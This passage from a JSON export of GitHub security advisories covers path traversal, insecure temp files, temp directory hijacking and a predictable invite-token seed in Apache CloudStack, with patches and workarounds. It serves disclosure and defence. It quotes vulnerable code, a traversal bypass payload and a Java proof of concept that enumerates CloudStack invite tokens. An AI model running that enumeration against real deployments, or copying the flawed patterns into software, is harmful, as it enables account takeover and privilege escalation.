"https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": 
"https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "identifiers": [ { "value": "GHSA-7hfp-mpq6-2jhf", "type": "GHSA" } ], "state": "published", "created_at": "2022-05-13T16:50:01Z", "updated_at": "2022-05-16T21:45:15Z", "published_at": "2022-05-16T21:45:15Z", "closed_at": null, "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": "npm", "name": "react-native-code-push" }, "vulnerable_version_range": "<=v7.0.4", "patched_versions": "", "vulnerable_functions": [] } ], "cvss": { "vector_string": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "score": 8.1 }, "cwes": [ { "cwe_id": "CWE-22", "name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')" } ], "cwe_ids": [ "CWE-22" ], "credits": [ { "login": "JLLeitschuh", "type": "analyst" } ], "credits_detailed": [ { "user": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": 
"https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "accepted" } ] }, { "ghsa_id": "GHSA-hfmw-fx2m-jj4c", "cve_id": "CVE-2022-23082", "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-hfmw-fx2m-jj4c", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-hfmw-fx2m-jj4c", "summary": "Improper Limitation of a Pathname to a Restricted Directory ('Partial Path Traversal') in io.whitesource:curekit", "description": "### Impact\r\n\r\n`io.whitesource.cure.FileSecurityUtils.isFileOutsideDir(String filePath, String baseDirPath)`  incorrectly treats sibling of a root directory (`baseDirPath`) as inside the root directory. 
As such, `isFileOutsideDir` is an insufficient guard against partial-path traversal attacks.\r\n\r\n#### Vulnerability Root Cause\r\n\r\n```java\r\n  public static boolean isFileOutsideDir(\r\n          @NonNull final String filePath, @NonNull final String baseDirPath) throws IOException {\r\n    File file = new File(filePath);\r\n    File baseDir = new File(baseDirPath);\r\n    return !file.getCanonicalPath().startsWith(baseDir.getCanonicalPath());\r\n  }\r\n```\r\n\\- https://github.com/whitesource/CureKit/blob/d6ac3c382cb9d0b7a9f164eb3db1811d51f47c7c/src/main/java/io/whitesource/cure/FileSecurityUtils.java#L14-L26\r\n\r\nThe above check can be bypassed with the following payload, because the canonical path `/usr/foo-bar/bar` starts with the string `/usr/foo` even though it is not under that directory:\r\n```java\r\n// The following will return 'false', although the attacker controlled value `/usr/foo/../foo-bar/bar` will be outside the `/usr/foo` directory\r\nisFileOutsideDir(\"/usr/foo/../foo-bar/bar\",  \"/usr/foo\")\r\n```\r\n\r\n#### True Root cause\r\n\r\n> If the result of `parent.getCanonicalPath()` is not slash terminated it allows for partial path traversal.\r\n>\r\n> Consider `\"/usr/outnot\".startsWith(\"/usr/out\")`. The check is bypassed although `outnot` is not under the `out` directory.\r\n> The terminating slash may be removed in various places. 
On Linux `println(new File(\"/var/\"))` returns `/var`, but `println(new File(\"/var\", \"/\"))` - `/var/`, however `println(new File(\"/var\", \"/\").getCanonicalPath())` - `/var`.\r\n> \\- [@JarLob (Jaroslav Lobačevski)](https://github.com/JarLob)\r\n\r\n### References\r\n\r\nSimilar vulnerabilities:\r\n - ESAPI (The OWASP Enterprise Security API) - https://nvd.nist.gov/vuln/detail/CVE-2022-23457", "severity": "critical", "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": 
"https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "identifiers": [ { "value": "GHSA-hfmw-fx2m-jj4c", "type": "GHSA" }, { "value": "CVE-2022-23082", "type": "CVE" } ], "state": "published", "created_at": "2022-05-11T17:06:09Z", "updated_at": "2023-02-27T19:41:51Z", "published_at": "2023-02-27T19:41:51Z", "closed_at": null, "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": "maven", "name": "io.whitesource:curekit" }, "vulnerable_version_range": ">= 1.0.1, < 1.1.4", "patched_versions": "1.1.4", "vulnerable_functions": [] } ], "cvss": { "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "score": 9.8 }, "cwes": [ { "cwe_id": "CWE-22", "name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')" } ], "cwe_ids": [ "CWE-22" ], "credits": [ { "login": "JLLeitschuh", "type": "analyst" } ], "credits_detailed": [ { "user": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", 
"organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "accepted" } ] }, { "ghsa_id": "GHSA-rvp4-r3g6-8hxq", "cve_id": "CVE-2022-26850", "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-rvp4-r3g6-8hxq", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-rvp4-r3g6-8hxq", "summary": "Insufficiently Protected Credentials via Insecure Temporary File in org.apache.nifi:nifi-single-user-utils", "description": "### Impact\r\n\r\n`org.apache.nifi.authentication.single.user.writer.StandardLoginCredentialsWriter` contains a local information disclosure vulnerability due to writing credentials (username and password) to a file that is readable by all other users on unix-like systems. On unix-like systems, the system's temporary directory is shared between all users on that system. 
As such, files written to that directory without setting the correct file permissions can allow other users on that system to view the contents of the files written to those temporary files.\r\n\r\n### Source\r\n\r\nAn insecure temporary file is created here:\r\n - https://github.com/apache/nifi/blob/6a1c7c72d5b91b9ce5d5cb5b86e3155d21e2c19b/nifi-commons/nifi-single-user-utils/src/main/java/org/apache/nifi/authentication/single/user/writer/StandardLoginCredentialsWriter.java#L75\r\n\r\nThe username and password credentials are written to this file here:\r\n - https://github.com/apache/nifi/blob/6a1c7c72d5b91b9ce5d5cb5b86e3155d21e2c19b/nifi-commons/nifi-single-user-utils/src/main/java/org/apache/nifi/authentication/single/user/writer/StandardLoginCredentialsWriter.java#L85-L95\r\n\r\n### Patches\r\n\r\nThe vulnerability has been patched in version `1.16`.\r\n\r\n### Prerequisites\r\n\r\nThis vulnerability impacts Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users.\r\n\r\n### Workarounds\r\n\r\nSetting the `java.io.tmpdir` system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability for all operating systems.\r\n\r\n### References\r\n\r\n - https://issues.apache.org/jira/browse/NIFI-9785\r\n - https://github.com/apache/nifi/commit/859d5fe\r\n - https://github.com/apache/nifi/pull/5856\r\n - https://nifi.apache.org/security.html#CVE-2022-26850\r\n - https://twitter.com/JLLeitschuh/status/1511736635645435904?s=20&t=I3w3zF6Y2DUvWYsEFqERjg", "severity": "medium", "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": 
"https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "identifiers": [ { "value": "GHSA-rvp4-r3g6-8hxq", "type": "GHSA" }, { "value": "CVE-2022-26850", "type": "CVE" } ], "state": "published", "created_at": "2022-03-09T19:15:43Z", "updated_at": "2022-04-06T16:37:48Z", "published_at": "2022-04-06T15:53:54Z", "closed_at": null, "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": "maven", 
"name": "org.apache.nifi:nifi-single-user-utils" }, "vulnerable_version_range": "<= 1.15.3", "patched_versions": "1.16", "vulnerable_functions": [] } ], "cvss": { "vector_string": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "score": 6.5 }, "cwes": [ { "cwe_id": "CWE-377", "name": "Insecure Temporary File" }, { "cwe_id": "CWE-522", "name": "Insufficiently Protected Credentials" } ], "cwe_ids": [ "CWE-377", "CWE-522" ], "credits": [ { "login": "JLLeitschuh", "type": "analyst" } ], "credits_detailed": [ { "user": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "accepted" } ] }, { "ghsa_id": "GHSA-cm59-pr5q-cw85", "cve_id": "CVE-2022-27772", "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-cm59-pr5q-cw85", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-cm59-pr5q-cw85", "summary": "Temporary Directory Hijacking to Local Privilege Escalation Vulnerability in org.springframework.boot:spring-boot", "description": "This was originally spotted by 
[@trungPa](https://github.com/trungPa) and communicated here: https://github.com/github/codeql/pull/4473#issuecomment-1030416237\r\n\r\n### Impact\r\n\r\nspring-boot versions prior to version `v2.2.11.RELEASE` were vulnerable to temporary directory hijacking. This vulnerability impacted the `org.springframework.boot.web.server.AbstractConfigurableWebServerFactory.createTempDir` method.\r\n\r\nThe vulnerable method is used to create a work directory for embedded web servers such as Tomcat and Jetty. The directory contains configuration files, JSP/class files, etc. If a local attacker got the permission to write in this directory, they could completely take over the application (i.e. local privilege escalation).\r\n\r\n#### Impact Location\r\n\r\nThis vulnerability impacted the following source location:\r\n\r\n```java\r\n\t/**\r\n\t * Return the absolute temp dir for given web server.\r\n\t * @param prefix server name\r\n\t * @return the temp dir for given server.\r\n\t */\r\n\tprotected final File createTempDir(String prefix) {\r\n\t\ttry {\r\n\t\t\tFile tempDir = File.createTempFile(prefix + \".\", \".\" + getPort());\r\n\t\t\ttempDir.delete();\r\n\t\t\ttempDir.mkdir();\r\n\t\t\ttempDir.deleteOnExit();\r\n\t\t\treturn tempDir;\r\n\t\t}\r\n```\r\n\\- https://github.com/spring-projects/spring-boot/blob/ce70e7d768977242a8ea6f93188388f273be5851/spring-boot-project/spring-boot/src/main/java/org/springframework/boot/web/server/AbstractConfigurableWebServerFactory.java#L165-L177\r\n\r\nThis vulnerability exists because `File.mkdir` returns `false` when it fails to create a directory rather than throwing an exception, and the code above never checks that return value. 
As such, the following race condition exists:\r\n\r\n```java\r\nFile tmpDir =File.createTempFile(prefix + \".\", \".\" + getPort()); // Attacker knows the full path of the file that will be generated\r\n// delete the file that was created\r\ntmpDir.delete(); // Attacker sees file is deleted and begins a race to create their own directory before the application does.\r\n// and make a directory of the same name\r\n// SECURITY VULNERABILITY: Race Condition! - Attacker beats java code and now owns this directory\r\ntmpDir.mkdir(); // This method returns 'false' because it was unable to create the directory. No exception is thrown and the return value is not checked.\r\n// Attacker can write any new files to this directory that they wish.\r\n// Attacker can read any files created by this process.\r\n```\r\n\r\n### Prerequisites\r\n\r\nThis vulnerability impacts Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users.\r\n\r\n### Patches\r\n\r\nThis vulnerability was inadvertently fixed as a part of this patch: https://github.com/spring-projects/spring-boot/commit/667ccdae84822072f9ea1a27ed5c77964c71002d\r\n\r\nThis vulnerability is patched in versions `v2.2.11.RELEASE` or later.\r\n\r\n### Workarounds\r\n\r\nSetting the `java.io.tmpdir` JVM system property (e.g. `-Djava.io.tmpdir=/path/to/private/dir`; it is a system property, not an environment variable) to a directory that is exclusively owned by the executing user and not readable or writable by other users (e.g. mode `0700`) will fix this vulnerability for all operating systems.", "severity": "high", "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": 
"https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "identifiers": [ { "value": "GHSA-cm59-pr5q-cw85", "type": "GHSA" }, { "value": "CVE-2022-27772", "type": "CVE" } ], "state": "published", "created_at": "2022-02-07T18:42:15Z", "updated_at": "2022-03-23T17:16:52Z", "published_at": "2022-02-16T00:05:08Z", "closed_at": null, "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": "maven", "name": "org.springframework.boot:spring-boot" }, "vulnerable_version_range": "< v2.2.11.RELEASE", "patched_versions": "v2.2.11.RELEASE", 
"vulnerable_functions": [] } ], "cvss": { "vector_string": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "score": 7.8 }, "cwes": [ { "cwe_id": "CWE-377", "name": "Insecure Temporary File" }, { "cwe_id": "CWE-379", "name": "Creation of Temporary File in Directory with Insecure Permissions" } ], "cwe_ids": [ "CWE-377", "CWE-379" ], "credits": [ { "login": "trungPa", "type": "analyst" }, { "login": "JLLeitschuh", "type": "analyst" } ], "credits_detailed": [ { "user": { "login": "trungPa", "id": 17810017, "node_id": "MDQ6VXNlcjE3ODEwMDE3", "avatar_url": "https://avatars.githubusercontent.com/u/17810017?v=4", "gravatar_id": "", "url": "https://api.github.com/users/trungPa", "html_url": "https://github.com/trungPa", "followers_url": "https://api.github.com/users/trungPa/followers", "following_url": "https://api.github.com/users/trungPa/following{/other_user}", "gists_url": "https://api.github.com/users/trungPa/gists{/gist_id}", "starred_url": "https://api.github.com/users/trungPa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/trungPa/subscriptions", "organizations_url": "https://api.github.com/users/trungPa/orgs", "repos_url": "https://api.github.com/users/trungPa/repos", "events_url": "https://api.github.com/users/trungPa/events{/privacy}", "received_events_url": "https://api.github.com/users/trungPa/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "accepted" }, { "user": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": 
"https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "accepted" } ] }, { "ghsa_id": "GHSA-vpcc-9rh2-8jfp", "cve_id": "CVE-2022-26779", "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-vpcc-9rh2-8jfp", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-vpcc-9rh2-8jfp", "summary": "apache/cloudstack: Privileged escalation due to Predictable Seed in Pseudo-Random Number Generator (PRNG) and Use of Insufficiently Random Values", "description": "### Impact\r\n\r\nApache Cloudstack contains a privileged escalation vulnerability in the invite to project logic due to a predictable seed used in a PRNG.\r\n\r\n\r\n### Details\r\n\r\nWhen inviting a user or account to a project via the email, the methods `ProjectManagerImpl.inviteAccountToProject` or `ProjectManagerImpl.inviteUserToProject` are invoked, and a random token is emailed to the invitee to allow them to join the project.\r\n - https://github.com/apache/cloudstack/blob/f15cab16dab1fc6ae6576f9e5a6a3a1eec76e5a1/server/src/main/java/com/cloud/projects/ProjectManagerImpl.java#L849-L873\r\n - https://github.com/apache/cloudstack/blob/f15cab16dab1fc6ae6576f9e5a6a3a1eec76e5a1/server/src/main/java/com/cloud/projects/ProjectManagerImpl.java#L875-L895\r\n\r\nHowever, this random token is generated predictably using the method `generateToken` with the value of `10` using `System.currentTimeMillis()` as the seed for the random number generator.\r\n - 
https://github.com/apache/cloudstack/blob/f15cab16dab1fc6ae6576f9e5a6a3a1eec76e5a1/server/src/main/java/com/cloud/projects/ProjectManagerImpl.java#L1350-L1359\r\n   ```java\r\n    public static String generateToken(int length) {\r\n        String charset = \"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ\";\r\n        Random rand = new Random(System.currentTimeMillis());\r\n        StringBuffer sb = new StringBuffer();\r\n        for (int i = 0; i < length; i++) {\r\n            int pos = rand.nextInt(charset.length());\r\n            sb.append(charset.charAt(pos));\r\n        }\r\n        return sb.toString();\r\n    }\r\n   ```\r\n\r\nBecause `java.util.Random` is fully determined by its seed and the seed is the millisecond timestamp, an attacker who knows roughly when an invite was generated for another user can enumerate every candidate token for that window (one per millisecond) and use the matching token to impersonate the invited user's invite acceptance.\r\n\r\nThe invite is stored in the database, but other than \"having the secret token\" there are no further checks that occur to ensure that the user taking advantage of the token is the user that the token was assigned to.\r\n\r\nThe site where the project invite is looked up from the database:\r\n - https://github.com/apache/cloudstack/blob/f15cab16dab1fc6ae6576f9e5a6a3a1eec76e5a1/server/src/main/java/com/cloud/projects/ProjectManagerImpl.java#L1202\r\nNotice how the account of the current user making the request isn't included in the lookup.\r\n\r\nThe user that is the current caller is pulled from the request here:\r\n - https://github.com/apache/cloudstack/blob/f15cab16dab1fc6ae6576f9e5a6a3a1eec76e5a1/server/src/main/java/com/cloud/projects/ProjectManagerImpl.java#L1189-L1190\r\n\r\nThen, that accepted invite is assigned to the calling user here:\r\n - https://github.com/apache/cloudstack/blob/f15cab16dab1fc6ae6576f9e5a6a3a1eec76e5a1/server/src/main/java/com/cloud/projects/ProjectManagerImpl.java#L1234\r\n - 
https://github.com/apache/cloudstack/blob/f15cab16dab1fc6ae6576f9e5a6a3a1eec76e5a1/server/src/main/java/com/cloud/projects/ProjectManagerImpl.java#L1241\r\n\r\nAs such, an attacker is able to accept an invite to a project that was never sent to them, because they can compute the value of the invite token.\r\n\r\n\r\n### Proof Of Concept\r\n\r\nThe following code prints every token that `generateToken(10)` can produce for an invite created within the next hour (one candidate per millisecond seed, 3,600,001 in total):\r\n\r\n```java\r\npublic static String generateToken(long time, int length) {\r\n    String charset = \"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ\";\r\n    Random rand = new Random(time);\r\n    StringBuffer sb = new StringBuffer();\r\n    for (int i = 0; i < length; i++) {\r\n        int pos = rand.nextInt(charset.length());\r\n        sb.append(charset.charAt(pos));\r\n    }\r\n    return sb.toString();\r\n}\r\n\r\npublic static void main(String[] args) {\r\n    long startTime = System.currentTimeMillis();\r\n    LongStream\r\n        .rangeClosed(startTime + 0, startTime + (long) (3_600_000))\r\n        .parallel()\r\n        .mapToObj(time -> generateToken(time, 10))\r\n        .forEach(System.out::println);\r\n}\r\n```\r\n\r\n### Patches\r\n\r\n - https://github.com/apache/cloudstack/commit/3fc4ef478d03cd20169d5a3dcdef6233724446be\r\n\r\n### Workarounds\r\n\r\nWhen executing the `addAccountToProject` API call, don't invite by email. 
Only invite by existing account or user.\r\n\r\n### Mitigating Factors\r\n\r\n`project.invite.required` is false by default and is something that must be enabled by end-users explicitly.\r\n\r\n### References\r\n\r\n - https://owasp.org/www-community/vulnerabilities/Insecure_Randomness\r\n\r\n### For more information\r\n\r\nOpen an issue with the Apache Cloudstack team here: https://github.com/apache/cloudstack/issues\r\n", "severity": "medium", "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": 
"https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "identifiers": [ { "value": "GHSA-vpcc-9rh2-8jfp", "type": "GHSA" }, { "value": "CVE-2022-26779", "type": "CVE" } ], "state": "published", "created_at": "2022-02-04T23:10:24Z", "updated_at": "2022-03-14T14:46:40Z", "published_at": "2022-03-10T17:04:18Z", "closed_at": null, "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": "none", "name": "apache/cloudstack" }, "vulnerable_version_range": "<= 4.16.0.0", "patched_versions": "4.16.1.0", "vulnerable_functions": [] } ], "cvss": { "vector_string": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:L", "score": 6.7 }, "cwes": [ { "cwe_id": "CWE-330", "name": "Use of Insufficiently Random Values" }, { "cwe_id": "CWE-337", "name": "Predictable Seed in Pseudo-Random Number Generator (PRNG)" } ], "cwe_ids": [ "CWE-330", "CWE-337" ], "credits": [ { "login": "JLLeitschuh", "type": "analyst" } ], "credits_detailed": [ { "user": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": 